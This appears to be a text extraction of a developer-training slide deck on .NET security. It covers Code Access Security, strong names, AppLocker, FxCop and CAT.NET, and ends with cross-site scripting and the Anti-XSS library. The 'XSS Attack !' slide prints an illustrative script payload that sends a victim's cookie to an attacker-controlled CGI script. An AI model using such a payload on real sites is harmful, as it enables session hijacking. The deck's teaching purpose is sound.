.NET Code security including 4.0 & Tools Jon C. Arce
Agenda Available Tools.NET Code Access Security FxCopCAT.NET.NET Framework Security Features Code Access Security Role-Based Security Cryptography Securing ASP.NET Web Applications Securing ASP.NET Web Services
.NET Code Access Security (CAS) Policy Code Access Security (CAS) is the.NET Common Language Runtime (CLR) mechanism for maintaining security based on the identity of code. You need to sign the code, to add EXTERNAL configuration security to the application.
Strong-Named Assemblies Strong names are Unique identifiers (containing a public key) Used to digitally sign assemblies Strong-named assemblies Prevent tampering Confirm the identity of the assembly’s publisher Allow side-by-side components sn –k MyFullKey.snk
Evidence-Based Security Evidence Is assessed when an assembly is loaded Is used to determine the permissions for the assembly Can include the assembly’s: Strong name information URLZone Authenticode signature
Security Policies (up to.NET 2.0) Security EntityDescription Policy Is set by administrators Is enforced at runtime Simplifies administration Contains permissions Contains code groups Code Group Associates similar components Is evidence based Is linked to permission set(s) Permission Set Is a set of granted permissions
Permission Sets
Types of Security Checks Imperative security checks Create Permission objects Call Permission methods Declarative security checks Use Permission attributes Apply to methods or classes Overriding security checks Use the Assert method Prevent the stack walk
Security Check Stack Walks Call Stack Security System YourAssembly SomeAssembly.NET Framework Assembly Call to ReadFile Grant: Execute 1. An assembly requests access to a method in your assembly 2. Your assembly passes the request to a.NET Framework assembly 3. The security system ensures that all callers in the stack have the required permissions 4. The security system grants access or throws an exception Grant: ReadFile Permission Demand Security exception Access denied Grant access?
Permission Requests Used by developers to state required permissions Implemented by attributes Prevents an assembly from loading when minimum permissions are not available //I will only run if I can call unmanaged code [assembly:SecurityPermission (SecurityAction.RequestMinimum, UnmanagedCode=true)]
Create a code group Control Panel Control Panel
Specify Membership Condition Specify Membership Condition Specify Membership Condition
Select a permission set
Naming the permission set
Assign permission sets
Setting File I/O permissions
Completing Code Group Creation
Security Policy in the v4 CLR In previous releases of the.NET Framework, CAS policy applied to all assemblies loaded into an application the major areas that are seeing updates with the v4 CLR are: the major areas that are seeing updates with the v4 CLR are: Security policy Security policy Security transparency APTCA (AllowPartiallyTrustedCallersAttribute) Evidence AppDomain Managers security.aspx
Sandboxing Privileged Code Partial Trust Web Application Wrapper Assembly Secured Resource Sandboxed Code <trust level_”Medium” originUri_--/> Permissions Demanded then Asserted AllowPartiallyTrustedCallers attribute added Assembly installed into the global assembly cache Resource Access
Evidence Types EvidenceDescription Application directoryThe application's installation directory. HashCryptographic hash as SHA1. PublisherSoftware publisher signature; that is, the Authenticode signer of the code. SiteSite of origin, such as Strong nameCryptographically strong name of the assembly. URLURL of origin. Zoneorigin such as Internet Zone.
AppDomain Managers In.NET, the basic unit of execution is NOT the process, rather it is that of the Application Domain. With AppDomains, multiple applications can run in the same process, thereby sharing the.NET runtime libraries. HostSecurityManager class apply policy and permissions. This technique determines the security for the entire AppDomain at once.
Software Restriction Policy You can use software restriction policies to identify software and to control its ability to run on your local computer, organizational unit, domain, or site. Control the ability of software to run on your system. Permit users to run only specific files on multiuser computers. Control whether software restriction policies affect all users or just certain users on a computer. Cancel an application to run (virus)
New Software Restriction Policies
1. Sign the application
2. Set the publisher Publish -> Options Publish -> Options
Windows Application Locker AppLocker is a new feature in Windows 7 and Windows Server 2008 R2 that allows you to specify which users or groups can run particular applications in your organization based on unique identities of files. If you use AppLocker, you can create rules to allow or deny applications from running like: executable files (.exe and.com), scripts (.js,.ps1,.vbs,.cmd, and.bat), Windows Installer files (.msi and.msp), and DLL files (.dll and.ocx)
Isolated Storage Provides a virtual file system Allows quotas Implements file system isolation based on: Application identity User identity IsolatedStorageFile isoStore = IsolatedStorageFile.GetUserStoreForAssembly();
TOOLS TO HELP WITH SECURITY
FXCop FxCop is a code analysis tool that checks.NET managed code assemblies for conformance to the Microsoft.NET Framework Design Guidelines. It inspect assemblies for more than 200 defects in the following areas: FxCop is a code analysis tool that checks.NET managed code assemblies for conformance to the Microsoft.NET Framework Design Guidelines. It inspect assemblies for more than 200 defects in the following areas: FxCop Library design Library design Globalization Globalization Naming conventions Naming conventions Performance Performance Interoperability and portability Interoperability and portability Security Security Usage Usage
FxCop demo
Microsoft Code Analysis Tool.NET CAT.NETCAT.NET is a static code analysis tool like fxCop but specially built for managed code and with a strong focus on security vulnerabilities. CAT.NET CAT.NET scans manage code for specific security vulnerabilities like: SQL injection SQL injection LDAP injection Cross Site Scripting XPATH injection and many other categories of vulnarabilities.
CAT.NET demo
Cross Site Scripting XSS stands for Cross Site Scripting, an XSS attack is when an attacker manages to inject Java script code or sometimes other code (usually Java Script) into a website causing it to execute the code. if an attacker made a specially crafted link and sent it to an unsuspecting victim and that victim clicked the link and a piece of Java Script code could be executed which would send the victims cookie away to a CGI Script Cross-site scripting carried out on websites were roughly 80% of all documented security vulnerabilities as of 2007
XSS Attack ! Send the victim and , with the following HTML: document.location.replace(' eewebhost.com/ph33r/steal.cgi?'+document.cookie); ">Check this Article Out! document.location.replace(' eewebhost.com/ph33r/steal.cgi?'+document.cookie); ">Check this Article Out! The user would of course click the link and they would be lead to the CNN News Article, but at the same time the attacker would of been able to also direct the user towards his specially crafted URL, he now has the users cookie. Using the Firefox cookie editor the attacker copies and pastes the victims cookie and uses it for himself.
Microsoft Anti-Cross Site Scripting Library V3.0 The Microsoft Anti-Cross Site Scripting Library V3.0 (Anti-XSS V3.0) is an encoding library designed to help developers protect their ASP.NET web-based applications from XSS attacks. It differs from most encoding libraries in that it uses the white-listing technique -- sometimes referred to as the principle of inclusions -- to provide protection against XSS attacks. 1EE83C-5CCF-48ED F56A6BFC09&displaylang=en
Session Summary.NET Framework Security Features Code Access Security Role-Based Security Cryptography Securing ASP.NET Web Applications Securing ASP.NET Web Services
Next Steps 1. Stay informed about security Sign up for security bulletins: Get the latest Microsoft security guidance: 2. Get additional security training Find online and in-person training seminars: Find a local CTEC for hands-on training:
For More Information Microsoft Security Site (all audiences) MSDN Security Site (developers) TechNet Security Site (IT professionals)
Questions and Answers